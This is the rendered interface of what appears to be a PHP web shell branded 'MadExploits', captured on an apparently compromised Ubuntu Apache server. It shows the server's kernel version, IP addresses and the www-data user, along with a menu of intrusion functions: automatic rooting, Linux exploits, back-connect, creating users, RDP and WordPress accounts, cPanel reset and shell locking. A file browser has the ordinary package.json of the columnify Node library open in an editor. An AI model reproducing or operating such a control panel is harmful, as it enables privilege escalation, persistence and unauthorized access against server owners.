Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.190.105
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
nodejs /
columnify /
[ HOME SHELL ]
Name
Size
Permission
Action
columnify.js
9.91
KB
-rw-r--r--
index.js
9.19
KB
-rw-r--r--
package.json
1.06
KB
-rw-r--r--
utils.js
4.75
KB
-rw-r--r--
width.js
143
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "columnify", "version": "1.5.4", "description": "Render data in text columns. Supports in-column text-wrap.", "main": "columnify.js", "scripts": { "pretest": "npm prune", "test": "make prepublish && tape test/*.js | tap-spec", "bench": "npm test && node bench", "prepublish": "make prepublish" }, "babel": { "presets": [ "es2015" ] }, "author": "Tim Oxley", "license": "MIT", "devDependencies": { "babel": "^6.3.26", "babel-cli": "^6.3.17", "babel-preset-es2015": "^6.3.13", "chalk": "^1.1.1", "tap-spec": "^4.1.1", "tape": "^4.4.0" }, "repository": { "type": "git", "url": "git://github.com/timoxley/columnify.git" }, "keywords": [ "column", "text", "ansi", "console", "terminal", "wrap", "table" ], "bugs": { "url": "https://github.com/timoxley/columnify/issues" }, "homepage": "https://github.com/timoxley/columnify", "dependencies": { "strip-ansi": "^3.0.0", "wcwidth": "^1.0.0" }, "directories": { "test": "test" } }
Close